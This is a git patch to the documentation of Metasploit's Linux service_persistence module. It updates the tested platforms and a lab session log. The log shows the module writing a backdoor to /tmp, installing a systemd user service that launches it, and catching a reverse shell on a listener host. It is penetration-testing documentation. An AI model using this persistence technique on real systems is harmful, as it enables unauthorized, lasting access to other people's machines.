From a6782cbee4b319699bece7517c2a8a191a5a0e26 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 6 Mar 2019 00:47:12 -0600 Subject: [PATCH] Update module doc with my testing notes --- .../linux/local/service_persistence.md | 58 ++++++++----------- 1 file changed, 23 insertions(+), 35 deletions(-) diff --git a/documentation/modules/exploit/linux/local/service_persistence.md b/documentation/modules/exploit/linux/local/service_persistence.md index 7e22032d77..782262296d 100644 --- a/documentation/modules/exploit/linux/local/service_persistence.md +++ b/documentation/modules/exploit/linux/local/service_persistence.md @@ -5,9 +5,10 @@ 1. Kali 2.0 (System V) 2. Ubuntu 14.04 (Upstart) 3. Ubuntu 16.04 (systemd) -4. Centos 5 (System V) -5. Fedora 18 (systemd) -6. Fedora 20 (systemd) +4. Ubuntu 16.04 (systemd user) +5. Centos 5 (System V) +6. Fedora 18 (systemd) +7. Fedora 20 (systemd) ## Verification Steps @@ -253,16 +254,16 @@ Now with a multi handler, we can catch systemd restarting the process every 10se [*] Starting the payload handler... [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400 -### systemd user +### systemd (Ubuntu 16.04 Server - vagrant) - msf5 exploit(linux/local/service_persistence) > show options + msf5 exploit(linux/local/service_persistence) > options Module options (exploit/linux/local/service_persistence): Name Current Setting Required Description ---- --------------- -------- ----------- SERVICE no Name of service to create - SESSION 1 yes The session to run this module on. + SESSION -1 yes The session to run this module on. SHELLPATH /tmp yes Writable path to put our shell SHELL_NAME no Name of shell file to write 
@@ -271,8 +272,8 @@ Now with a multi handler, we can catch systemd restarting the process every 10se Name Current Setting Required Description ---- --------------- -------- ----------- - LHOST 127.0.0.1 yes The listen address (an interface may be specified) - LPORT 4445 yes The listen port + LHOST 172.28.128.1 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port Exploit target: 
@@ -285,33 +286,20 @@ Now with a multi handler, we can catch systemd restarting the process every 10se msf5 exploit(linux/local/service_persistence) > run [!] SESSION may not be compatible with this module. - [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want - ReverseListenerBindAddress? - [*] Started reverse TCP handler on 127.0.0.1:4445 - [*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1 - 5:45:16 -0500 - - id - uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres) - exit - [*] 127.0.0.1 - Command shell session 2 closed. - msf5 exploit(linux/local/service_persistence) > set VERBOSE true - VERBOSE => true - msf5 exploit(linux/local/service_persistence) > run - - [!] SESSION may not be compatible with this module. - [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want - ReverseListenerBindAddress? - [*] Started reverse TCP handler on 127.0.0.1:4445 - [*] Writing backdoor to /tmp/iEucd - [*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service + [*] Started reverse TCP handler on 172.28.128.1:4444 + [*] Writing backdoor to /tmp/PPpCF + [*] Max line length is 65537 + [*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf + [*] Creating user service directory + [*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service + [*] Max line length is 65537 + [*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf [*] Reloading manager configuration [*] Enabling service - [*] Starting service: uKxHqmV - [*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1 - 5:45:30 -0500 + [*] Starting service: OzzdRBC + [*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600 - echo hi lennart - hi lennart - exit - [*] 127.0.0.1 - Command shell session 3 closed. 
+ id
+ uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
+ uname -a
+ Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux